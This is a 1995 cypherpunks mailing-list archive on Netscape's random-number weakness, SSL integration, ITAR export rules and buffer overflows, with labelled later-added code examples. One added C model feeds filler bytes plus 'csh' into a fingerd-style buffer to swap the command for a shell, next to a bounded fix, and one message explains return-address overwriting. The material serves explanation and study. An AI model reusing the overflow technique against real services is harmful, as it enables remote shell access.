From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Thu, 21 Sep 95 13:41:50 PDT
To: cypherpunks@toad.com
Subject: Cryptography book source
Message-ID: <199509212041.NAA17913@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Just stumbled on to an online book vendor that advertises over a million
titles available for order, many discounted from list.  Very nice Web
interface.  A quick search for "cryptography" displayed 121 titles.  A wide
range, from Crypto proceedings to technical to historical.

Check out:

http://www.amazon.com

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Wed, 20 Sep 95 21:23:36 PDT
To: cwe@Csli.Stanford.EDU (Christian Wettergren)
Subject: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509200729.AAA24565@Csli.Stanford.EDU>
Message-ID: <199509210419.OAA28994@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Christian Wettergren <cwe@Csli.Stanford.EDU>
 
Christian Wettergren wrote:
...
> One wild idea that I just got was to have servers and clients exchange
> random numbers (not seeds of course), in a kind of chaining way. Since
...

Okay, that doesn't sound so hard...

Have a look at
http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/random?RandValue
where you replace RandValue by any text string.

Please do not try to break the implementation, I *know* you can overrun
buffers, use shell metacharacters and generally stuff around.
Just don't, OK? Thanks.

Feel free to try to break the algorithm, though.


> Problems:
> * watch out for "multiply by zero" attacks by a rogue server/client.
> * watch out for "almost singular values" in the same way.

Don't know about these...

> * only let one source contribute a certain amount of randomness, like
>   (key length)/(aver # of peers).

Well I don't keep track of entropy, so that doesn't apply, does it...

> * never reveal your current seed, only a non-trivially derived random 
>   value from it. (of course)

I reveal md5 hash of my seed only.

> * make sure your initial seed is good enough, or the whole thing is
>   broken.

Well, entropy put in must be greater than entropy used or lost through
cracked connections. (Ie not just "initial", also entropy put in along
the way.)

I fail this point either way.

> * perhaps save part of the previous session state into a protected
>   file, to be able to keep up the quality of the initial seed.

Yup, I do that (though "quality" would be quite a bit of a euphemism, and
the file is hardly protected at all).


Have fun!

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anarchist <rr251070@hvcc.edu>
Date: Thu, 21 Sep 95 11:31:35 PDT
To: cypherpunks@toad.com
Subject: Has anyone seen the CatMan (catburgler)?
Message-ID: <Pine.3.89.9509211446.A68256-0100000@academ.hvcc.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am trying to find someone who calls himself catman or catburgler.
In Nov. 94 he was serving in Albany County Jail in NY. If anyone has any
information that may help, like his E-mail address, I'd really like to hear
from you...
  My address is below.

**********************************************
Email: rr251070@academ.hvcc.edu
Email alias: Anarchist
At: Hudson Valley Community College
    80 Vandenburgh Ave
    Troy, NY 12180
----------------------------------------------
Anarchy- A movement to rid society of
   structured government, and to create a 
   system based on co-operation and
   non-violence!
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Wed, 20 Sep 95 22:24:52 PDT
To: "Erik E. Fair" <fair@clock.org>
Subject: Re: Please send me SSL problems...
In-Reply-To: <v02110104ac85a804545b@[204.179.132.1]>
Message-ID: <Pine.SOL.3.91.950921150731.23836F-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



A few comments from Tim Hudson who has put SSL into telnet and ftp, he is
not on this list but since he is my personal 'put SSL into applications' 
person (I just write the library :-), I felt his comments would be better 
than mine :-)

On Wed, 20 Sep 1995, Erik E. Fair wrote:
> Jeff, the SSL specification has a severe *architectural* problem - it
> assumes that Internet Protocols are APIs - interface standards, and that
...
> You can't fiddle with a communication protocol without getting agreement
> from everyone about the change, or extend it in a way that is compatible
> with the protocol you're modifying, on a per-protocol basis (e.g. adding a
> TELNET negotiation option to TELNET for encryption, an FTP command to FTP,
> etc). Otherwise, all you've done is made a private, non-interoperable

[tjh]
I agree with this statement - application of SSL at the TCP level for all
communication is possible but *not* desirable in the general case - i.e.
for internet communication.

A much better approach (and the one that I have taken for adding SSL into
TELNET and FTP) is to use *existing* negotiation mechanisms for dynamically
switching on SSL for a given link based on determining dynamically if
the server you are connecting to will support it.

Naturally you want options at both the server and the client that enable
you to:
    - fall back to "normal/insecure" mode if SSL is not available
    - drop the connection in the client if SSL is not negotiated
    - drop the connection in the server if SSL is not negotiated

My aim when adding SSL (in the form of SSLeay) into an existing server
was *always* to be able to run the *one* server for both the "old" and
the "new" protocol. I really was getting annoyed at seeing announcements
of yet-another-security package that could be installed that provided
another potentially insecure access path into the system that only supported
connecting to it with its own fixed protocol.

SSL can be seen in its simplest form as just a nice mechanism for
dynamically negotiating a *cipher* - this is how I initially set things
up so that the "normal" authentication mechanisms had to still be used
for connection - i.e. SSLtelnet still required the normal account password
to get access. This has since been "enhanced" so that you can switch on
an option that uses a certificate exchange as the security 
access mechanism (this is not switched on by default).

For TELNET the "best" place to start seemed to be the work done with
SRATELNET ... it already had all the hooks in the right places for 
using the RFC-defined TELNET extensions that enabled negotiation of 
authentication and encryption. (the documentation that came with SRAtelnet
was also nice and clear too).

For FTP there was a similar way of doing things so I used it too ... and
FTP is a *great* example of a protocol where doing things at the TCP
level (transparently) would be "bad" - it used two ports ... one of which is
usually dynamically allocated ... and you certainly don't want to 
redo the initial SSL negotiation for each file that you transfer!
(SSLftp reuses the session ID).

Another thing that is worth noting (and worth looking at too) is the
different API offered in SSLREF and SSLeay (... naturally I prefer SSLeay
as I have influence over the author ;-) ... From what I know of the SSLREF
API, it takes the approach of providing wrapper functions that you use
*instead* of the "normal"  functions ... there is (not using the right
names) SSLaccept and SSLconnect that you use that perform the accept() and
connect() along with all the other things required in the SSL protocol
being hidden which sounds nice until you want to do something like FTP ...
where the connection for the DATA socket is formed in the opposite
direction to the CONTROL socket - with SSLeay you do the accept() and
connect() yourself ... as per normal and then run SSL_accept() or
SSL_connect() which does the "logical" SSL stuff ... so in FTP I can do a
connect() and then an SSL_accept() which looks funny but is the "right"
thing to do.  SSLeay has only 2 function calls that operate on socket 
file descriptors, a single read() and a single write().  The most recent
version will handle non-blocking IO if the application passes a file
descriptor with it turned on.  SSLeay does not do a single
setsockopt(), ioctl(), fcntl(), accept(), bind(), select() etc. 

If you haven't looked at SSLeay or looked at the SSL protocol itself then
you really should grab it and have a read (while ignoring the politics   
and the WWW hype over SSL).

Tim

[eay]
While there are problems with certificate distribution, this will be 
overcome.  Ever tried general inter-realm authentication with Kerberos?

Both SSLref and SSLeay interoperate.  From what I know of the SSLref API, 
our APIs are quite different.  Just because SSLref may 'force' you
towards a particular style of SSL use does not mean the protocol forces 
you to use it this way.

eric
Standard billboard

http://www.psy.uq.oz.au/~ftp/Crypto/
ftp.psy.uq.oz.au:/pub/Crypto/SSL/
ftp.psy.uq.oz.au:/pub/Crypto/SSLapps/

--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
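
Added example, not part of the original message and not SSLtelnet or SSLeay code: a C model of the three per-endpoint options Tim Hudson lists (fall back, drop in the client, drop in the server), showing which pairs of settings can still end in a cleartext session when the SSL offer never reaches the server. The option-line format and all identifiers are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Per-endpoint settings matching the options listed in the message.
 * All names and the one-line option format are hypothetical. */
enum policy  { ALLOW_FALLBACK, REQUIRE_SSL };
enum outcome { SESSION_SSL, SESSION_CLEARTEXT,
               DROPPED_BY_CLIENT, DROPPED_BY_SERVER };

struct endpoint {
    int         supports_ssl;   /* built with an SSL library? */
    enum policy policy;         /* what to do when SSL is not agreed */
};

/* Constructed sample configurations. */
static const struct endpoint NEW_LAX    = { 1, ALLOW_FALLBACK };
static const struct endpoint NEW_STRICT = { 1, REQUIRE_SSL };
static const struct endpoint OLD_PEER   = { 0, ALLOW_FALLBACK };

/* Whatever sits between the two ends. With drops_offer set it forwards the
 * client's option line with the SSL offer removed, which to the server looks
 * exactly like an old client that has never heard of SSL. */
static void relay(int drops_offer, const char *in, char *out, size_t outsz)
{
    char *p;
    snprintf(out, outsz, "%s", in);
    if (drops_offer && (p = strstr(out, " SSL")) != NULL)
        memmove(p, p + 4, strlen(p + 4) + 1);
}

static enum outcome negotiate(struct endpoint c, struct endpoint s,
                              int relay_drops_offer)
{
    char sent[32], seen[32];
    int agreed;

    /* 1. The client uses the protocol's existing option exchange to say
     *    what it can do. */
    snprintf(sent, sizeof sent, "OPTIONS ECHO%s", c.supports_ssl ? " SSL" : "");
    relay(relay_drops_offer, sent, seen, sizeof seen);

    /* 2. The server switches SSL on only if it was offered and supported. */
    agreed = s.supports_ssl && strstr(seen, " SSL") != NULL;
    if (agreed)
        return SESSION_SSL;

    /* 3. No agreement: each end applies its own policy. */
    if (s.policy == REQUIRE_SSL) return DROPPED_BY_SERVER;
    if (c.policy == REQUIRE_SSL) return DROPPED_BY_CLIENT;
    return SESSION_CLEARTEXT;
}

/* Audit helper: can this pair of configurations ever carry a session in
 * the clear, whether or not the offer reaches the server? */
static int cleartext_possible(struct endpoint c, struct endpoint s)
{
    return negotiate(c, s, 0) == SESSION_CLEARTEXT ||
           negotiate(c, s, 1) == SESSION_CLEARTEXT;
}

int main(void)
{
    static const char *name[] = { "SSL session", "cleartext session",
                                  "dropped by client", "dropped by server" };

    printf("lax client, lax server:            %s\n",
           name[negotiate(NEW_LAX, NEW_LAX, 0)]);
    printf("same pair, offer lost in transit:  %s\n",
           name[negotiate(NEW_LAX, NEW_LAX, 1)]);
    printf("strict client, offer lost:         %s\n",
           name[negotiate(NEW_STRICT, NEW_LAX, 1)]);
    printf("old client, strict server:         %s\n",
           name[negotiate(OLD_PEER, NEW_STRICT, 0)]);
    printf("lax/lax can end in cleartext:      %d\n",
           cleartext_possible(NEW_LAX, NEW_LAX));
    return 0;
}
```

Running one server for both old and new clients means the server keeps the fallback option, so the guarantee that a session is never sent in the clear has to come from the client-side "drop the connection" setting.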






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 21 Sep 95 15:42:57 PDT
To: cypherpunks@toad.com
Subject: netscape bug
Message-ID: <199509212242.PAA04533@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DF8qC9.4Cw@sgi.sgi.com>, "Vladimir Z. Nuri" <vznuri@netcom.com> writes:

> P.M. notes that anywhere there is a data-driven buffer overflow (which
> he suspects are all over netscape) he can get code to execute anything
> he wants. this reminds me of the
> Morris internet worm that ran exactly the same way. it used a
> bug in the finger demon that caused a string buffer overwrite
> (via strcpy, instead of strncpy) to execute customized code.

> my question: I have not seen the specifics of how this works. does
> this require specialized knowledge of the native machine language on the 
> host machine? or is it just used to cause something like a core dump
> to get a command line or something like that?

I question the accuracy of this.  The fingerd bug was that a string in
the static data area was read in with gets which could be overflowed.
At some point in memory after this input buffer was the string constant
that stored the name of the finger command.  What the Morris worm did
was to overflow the input buffer and replace the string constant
"finger" with "csh".  When fingerd then exec'ed the command, that gave
you a shell running on the machine.

While it is certainly true that you can stomp on memory in static
buffers, it's not clear that you can execute whatever code you insert
there.  If the buffer happens to be allocated off the stack (and the
stack grows down) then you can modify the return address.  Of course,
you have to know the address of whatever code you want to execute.  And
that code has to do something useful.  Presumably, if there are two
bugs, one which lets you write over a static buffer and one for a buffer
allocated from the stack, then you could execute code of your choosing.
Of course, that also assumes that you can execute from the data area
which is not always true.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com
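
Added example, not part of the original message and not fingerd source: a C model of the memory layout this message describes, with an input buffer in static data followed by the string naming the program to run, comparing a gets()-style unbounded read with a bounded one. The buffer sizes, function names and the flat array standing in for the data segment are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model: one flat array stands in for the static data area, so
 * an over-long copy crosses from the request buffer into the command name
 * without leaving the object (the model itself has no undefined behaviour). */
#define LINE_SZ 16                  /* hypothetical request buffer size */
#define CMD_SZ  16                  /* hypothetical command string size */

static char data_seg[LINE_SZ + CMD_SZ];
#define LINE (data_seg)             /* request buffer region */
#define CMD  (data_seg + LINE_SZ)   /* command name region   */

/* Constructed inputs: an ordinary request, and one that is LINE_SZ bytes of
 * filler followed by the replacement name given in the message. */
static const char SHORT_REQ[] = "alice";
static const char LONG_REQ[]  = "AAAAAAAAAAAAAAAA" "csh";

static void reset_segment(void)
{
    memset(data_seg, 0, sizeof data_seg);
    strcpy(CMD, "finger");
}

/* gets()-style read: copies up to the terminator and never looks at the
 * size of the destination. The loop is capped at the end of data_seg only
 * to keep the demonstration inside one object. */
static void read_request_unbounded(const char *input)
{
    size_t i = 0;
    while (input[i] != '\0' && i < sizeof data_seg - 1) {
        data_seg[i] = input[i];
        i++;
    }
    data_seg[i] = '\0';
}

/* Bounded read, the role fgets(buf, sizeof buf, stdin) plays in real code.
 * A request that does not fit, terminator included, is rejected outright
 * instead of being truncated. Returns 0 on success, -1 on rejection. */
static int read_request_bounded(const char *input)
{
    size_t n = strlen(input);
    if (n >= LINE_SZ) {
        LINE[0] = '\0';
        return -1;
    }
    memcpy(LINE, input, n + 1);
    return 0;
}

/* The program name the service would exec after handling one request. */
static const char *command_after(const char *input, int bounded)
{
    reset_segment();
    if (bounded)
        (void)read_request_bounded(input);
    else
        read_request_unbounded(input);
    return CMD;
}

int main(void)
{
    printf("unbounded, short request: exec \"%s\"\n",
           command_after(SHORT_REQ, 0));
    printf("unbounded, long request:  exec \"%s\"\n",
           command_after(LONG_REQ, 0));
    printf("bounded,   long request:  exec \"%s\"\n",
           command_after(LONG_REQ, 1));
    return 0;
}
```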




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Thu, 21 Sep 95 16:02:11 PDT
To: karlton@netscape.com
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <43psn2$6ug@tera.mcom.com>
Message-ID: <199509212245.PAA15299@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What I would like:
> 
>     Any OS has access to a number of real-world physical sources of
>     randomness. This information is not made available to a user level
>     process. How long did that last seek take? Was there any noise on
>     the microphone? It would be good if the OS could gather that
>     information and make some set of bits available to any process that
>     asks. Having this be part of all OSes would make my job easier.

We've got a *real* hardware random number generator that was developed
for our secure phones.  If you are seriously interested, we can
glue the RNG onto the end of a serial port for you.  It generates
about 8000 bits of uncorrelated noise / second.

Eric Blossom
COMSEC Partners
707-577-0409




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 21 Sep 95 13:00:46 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
Message-ID: <199509211956.PAA20713@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks:
I sent this yesterday, but it appears toad may have eaten it.
Here it is again.
JMR

-----BEGIN PGP SIGNED MESSAGE-----

Ian Goldberg wrote:

<snip>

>>So, any consensus as to whether it's actually illegal to do so?  I
>>remember some disagreement a few weeks ago that AFAIK wasn't resolved.

And Tim replied:

>The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
>of non-Americans," judging by the comments here.

And since _I_ started all this trouble with a private e-mail to Futplex;
I'll now jump in saying again, [IANAL]: "This t-shirt may or may not be
illegal to wear in front of non-Americans," from my reading a while back
of the dense text of this silly law, [I'll spare all of you a quote of
it, but there's text that MIGHT be interpreted that way.]

>The _reality_ is quite different, I think, and the "this shirt is illegal"
>hype is, in my opinion, just that, hyperbole.

I agree with Tim that actual enforcement of this silly law is unlikely,
especially in Ian's case right now, and *especially* during our US
(election) "silly season," for obvious reasons.

The availability of strong encryption is unlikely to be a major issue
during this election cycle, despite Cypherpunk efforts, and enforcement
of this dumb law would be a "gift" to those of us who think it should be.
[I hope I'm wrong here, but I think you're safe, Ian.:)]

>Even hyperbull, too.

I wouldn't go *that* far, though. Poorly written, ambiguous, statist<g>
laws can be interpreted in any number of ways and for a variety of
reasons having little (or nothing) to do with justice. <sigh>
JMR

<snip>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMGBvrW1lp8bpvW01AQFj1AP8C1RKpayv6V15sTBLiFLWV4tlfWRUuLfm
JVWgeUeHUFxBV1EttbGv30iTmwlCJmBab/wLUag9S57DLZ6Ajed7jQe0rpra56Nl
OgmM1gGU8nJJazYeqiWbYrOc/VSheSqQVLAj+vOoufW8XnU1iFkXQnRziCcyO2Nc
bto4hKBrFWY=
=qlSx
-----END PGP SIGNATURE-----
Regards, Jim Ray

  "People are deceived in masses, but enlightened one at a time."
   -- Dick Boddie.
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 21 Sep 95 16:35:29 PDT
To: cypherpunks@toad.com
Subject: Anyone for testing MOSS?
Message-ID: <199509212335.QAA19745@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I've just gotten TISMOSS 7.1 running (whew!) and wondered if there
was anyone else out there who could exchange encrypted email with me.
Here is my public key:

alias:raph@cs.berkeley.edu
public-key:MFkwCgYEVQgBAQICAgADSwAwSAJBAKQ2qG5eZDa58HpVxM9fpru2hDVVkw0iK
 GC3BMhagHpio7XlGydpkbY3iSV08U92VVbkyTeB2aWhSe2xUUaONPsCAwEAAQ==

   I guess I'll probably wait until next week to test S/MIME.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 21 Sep 95 00:10:32 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: (none)
In-Reply-To: <199509210627.XAA14935@blob.best.net>
Message-ID: <Pine.SOL.3.91.950921165214.28008A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, James A. Donald wrote:
> However the algorithm I described simply used less computation, but the
> overhead of continually doing MD5 is probably modest. 

On a 486DX50 Solaris 2.4 I can do about 40,000 md5's per second.
(if input is < 56 bytes and contiguous).

With a mixing algorithm this fast, you could use it once per 
byte and still have an acceptable RNG.
It is definitely my hash function of choice :-).

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Thu, 21 Sep 95 15:31:49 PDT
To: sameer@c2.org (sameer)
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <199509212030.NAA05084@infinity.c2.org>
Message-ID: <199509212125.RAA00188@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > > I am totally amazed! But think company insiders are probably
> > > supporting the stock.  Holding up better than ascii armor, it is. 
> > 
> > I think it probably has more to do with the fact that the name
> > "Netscape" has been on the front page of every major newspaper in the
> > US.  I guess bad press is better than no press at all.  And the press
> > hasn't even been that bad.

Yeah. That's the way it works sometimes. I remember back when that
housewife from Minnesota launched her media campaign to have "Married
With Children" taken off the air. All it did was make the show a
hundred times more popular and extend its life for years after it
probably would have been canceled on its own.

And the sad part is that now that they have announced that they are
dropping their unofficial Linux support, I really want to hurt
Netscape badly.

Sigh.

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 21 Sep 95 14:59:27 PDT
To: cypherpunks@toad.com
Subject: Crypto *import* ban?
Message-ID: <Pine.SOL.3.91.950921174825.6924C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


What exactly does a ban on import of "defense articles and services" 
which are not in "furtherance of world peace" mean?

Could you ban crypto imports?  Imports of chopped liver?


---------- Forwarded message ----------

Here is a final rule issued by ATF regarding the import of "defense articles"
into the United States.  It appears in the Federal Register at 60 FR 47866
(9/15/950).  This becomes a regulation in the Code of Federal Regulations,
Title 27 CFR, part 47, Importation of Arms.

	Sec. 47.52 Import restrictions applicable to certain countries.

	(a)	It is the policy of the United States to deny licenses
	and other approvals with respect to defense articles and defense
	services originating in certain countries or areas.  This policy
	applies to Cuba, Iran, Iraq, Libya, Mongolia, North Korea, Sudan,
	Syria, Vietnam, and the States that comprise the former Soviet
	Union [list of countries omitted].

	This policy applies to countries or areas with respect to which
	the United States maintains an arms embargo [list of countries
	omitted].
        
        It also applies when an import would not be in furtherance of
        world peace and the security and foreign policy of the United
        States.

	[end excerpt]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 21 Sep 95 15:22:52 PDT
To: cypherpunks@toad.com
Subject: real randomness for netscape - user clicking mouse
Message-ID: <Pine.3.89.9509211743.A459-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




Jeff Weinstein <jsw@neon.netscape.com> 
>If anyone has specific suggestions I would love to hear them so that we 
>can do a better job. 

Why not just do something similar to what PGP does?  

For netscape you could have a user make circling motions with the mouse
and clicking at random times.  For each click of the mouse you could get a
few bits of randomness from the time, the X position, and the Y position. 
You could get random bits really fast this way. 

You only need to do this the first time a user uses encryption, or you
might just go ahead and force all users to do this as part of starting up
netscape the first time. On subsequent times you use your encryption
algorithm to make your next seed. 

To be safe you could make up two seeds, encrypt each of them to mix them up 
a bit, and then XOR the results together.  A random bit XORed with a non-random bit 
still produces a random bit.  Actually there is probably a better way to just
encrypt each input whole (padding to block size) and XORing as you go along -
that way you would get whatever randomness was there to be had.  Anyway, do something 
so you have as many or more bits of randomness in your seed as there are bits 
in your key or it will still be a weak link in your security chain.

You could even get the randomness during regular mouse use.  Unless the first thing
a user did was try to use encryption I am sure you would have enough by the
time he did use encryption (keep track).

You must get the random bits from something that nobody else could watch. 
Network packets, process IDs, date, time, etc are not secure.  On the
other hand, an attacker would have to have broken the machine to get the
mouse info used above, in which case netscape would have no security no
matter what. 

   --  Vince

PS  I want a free netscape server site license if you use this idea!  :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Thu, 21 Sep 95 18:11:52 PDT
To: cjs@netcom.com (Christopher J. Shaulis)
Subject: Netscape to end Linux support?
In-Reply-To: <199509212125.RAA00188@hoopsnake.cjs.net>
Message-ID: <199509220108.SAA05948@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> And the sad part is that now that they have announced that they are
> dropping their unofficial Linux support, I really want to hurt
> Netscape badly.
> 
> Sigh.
> 
Anyone got a pointer to this announcement?

Damn!  Just when I was starting to like them ...

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 21 Sep 95 18:25:21 PDT
To: cypherpunks@toad.com
Subject: Pitfall in producing random numbers
Message-ID: <ac87c86d0102100466b3@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I think that it was on the cypherpunks list that I learned of how PGP for
the IBM PC, running under emulation on the Mac failed to produce good
random numbers. The virtual PC clock proceeded forward in a very predictable
manner. Perhaps the details were different but the nature of the pitfall is
clear. I did not notice that pitfall mentioned in RFC 1750. (It's the only
hazard that I know of that they missed.)

The only thing I can think of to protect against this is to do some simple
checks against more obvious ways that virtual clocks might produce times.
Low order bits should not always be zero. The differences between
successive readings should not be constant. Two clock readings separated by
a computation of known length should be within a factor of a few of the
expected value. If not try again once or twice.

Such tests are imperfect but I think that they would have noticed the
virtual clock on the virtual PC. If they fail the program can require the
user to enter the seed, with all that that entails.
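
[Added example, not part of the original message: the three checks described above (low-order bits, constant differences, a timed computation of known length), with the retry. The function names, the 3-bit mask, the factor of 4 and the two constructed test clocks are assumptions made for illustration.]

```python
"""Sanity checks for a clock that is about to be used as a seed source."""


def low_bits_stuck(readings, bits=3):
    """True if the low `bits` bits are zero in every reading."""
    mask = (1 << bits) - 1
    return all(r & mask == 0 for r in readings)


def constant_step(readings):
    """True if successive readings always differ by the same amount."""
    deltas = {b - a for a, b in zip(readings, readings[1:])}
    return len(deltas) <= 1


def timing_off(elapsed, expected, factor=4.0):
    """True if a computation of known length took implausibly long or short."""
    return elapsed <= 0 or not (expected / factor <= elapsed <= expected * factor)


def clock_problems(read_clock, work, expected, samples=32, attempts=3):
    """Run all three checks, trying again once or twice on failure.

    Returns [] as soon as one attempt passes every check, otherwise the
    list of checks that failed on the last attempt.
    """
    problems = []
    for _ in range(attempts):
        readings = [read_clock() for _ in range(samples)]
        start = read_clock()
        work()
        elapsed = read_clock() - start
        problems = []
        if low_bits_stuck(readings):
            problems.append("low-order bits always zero")
        if constant_step(readings):
            problems.append("constant difference between readings")
        if timing_off(elapsed, expected):
            problems.append("timed computation outside expected range")
        if not problems:
            return []
    return problems


class ConstructedClock:
    """Constructed test clock (not a model of any particular emulator).

    Each read advances the clock by `step` plus the next value in `jitter`.
    """

    def __init__(self, step, jitter=(0,)):
        self.t = 0
        self.step = step
        self.jitter = jitter
        self.reads = 0

    def read(self):
        self.t += self.step + self.jitter[self.reads % len(self.jitter)]
        self.reads += 1
        return self.t

    def advance(self, ticks):
        self.t += ticks


def demo():
    # Emulated clock: fixed 1024-tick step per read, blind to real work.
    virtual = ConstructedClock(step=1024)
    bad = clock_problems(virtual.read, lambda: None, expected=50_000)
    # Clock with per-read jitter that also advances while the work runs.
    real = ConstructedClock(step=1000, jitter=(3, 17, 8, 42, 5, 29, 11))
    good = clock_problems(real.read, lambda: real.advance(50_000), expected=50_000)
    return bad, good


if __name__ == "__main__":
    bad, good = demo()
    print("virtual clock:", bad)
    print("jittery clock:", good or "passed")
```

[A clock that fails should not be credited with any entropy; the fallback in the message above is to have the user enter the seed.]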






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 18:16:54 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*)
Message-ID: <ac875ce446021004e236@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Vlad writes:

>I would *die* to see an op-ed in the NYT with the subject:
>"economic espionage: the new bogeyman decoy after the cold war"

You might want to prepare your memorial service, then, as I recall reading
editorials along these lines back around 1990, when "should the NSA be used
for economic espionage?" was in the news.

Not the exact title of their editorial, but the gist was that turning the
NSA into a spy agency at the beck and call of Ford and Motorola is a bad
idea.

But if you die, Vlad, "the vznuri," at least you have seven other
functioning tentacles.

--Tim May


Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 18:32:43 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
Message-ID: <ac87605c47021004b2c9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:02 PM 9/21/95, Michael Shields wrote:
>> There is nothing in the ITAR that refers to ``machine-readable'' so
>> there is no need to interpret that term.
>
>The issue is that it has been formally used as the criterion that
>distinguishes "technical data" from "defense articles".  See Phil Karn's
>CJ requests on the _Applied Cryptography_ book and floppy.

Hear, hear! Michael is correct in pointing out that the "machine-readable"
part has indeed been a criterion...if the ITARs in general are unlikely to
withstand scrutiny, then trying to get books banned would really cause
problems.

Also, one of the criteria I recollect is that "systems" were barred from
export, not just algorithms. Algorithms are very widely discussed, even
described in detail in patents. "Cryptographic systems," embodied in
systems, circuits, and specific programs, are not the same as what gets
published in textbooks.

(BTW, I'm glad I can now read the posts of Michael Shields. His MIME PGP
was admirable, in intent, but many of us (from comments here and that were
sent to me) just can't handle whatever MIME configuration he was previously
using.)

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Thu, 21 Sep 95 12:00:37 PDT
To: thad@hammerhead.com (Thaddeus J. Beier)
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
In-Reply-To: <199509210637.XAA11478@hammerhead.com>
Message-ID: <m0svqr4-000DSHC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> Now, this is all expected to change, to become more harmonious
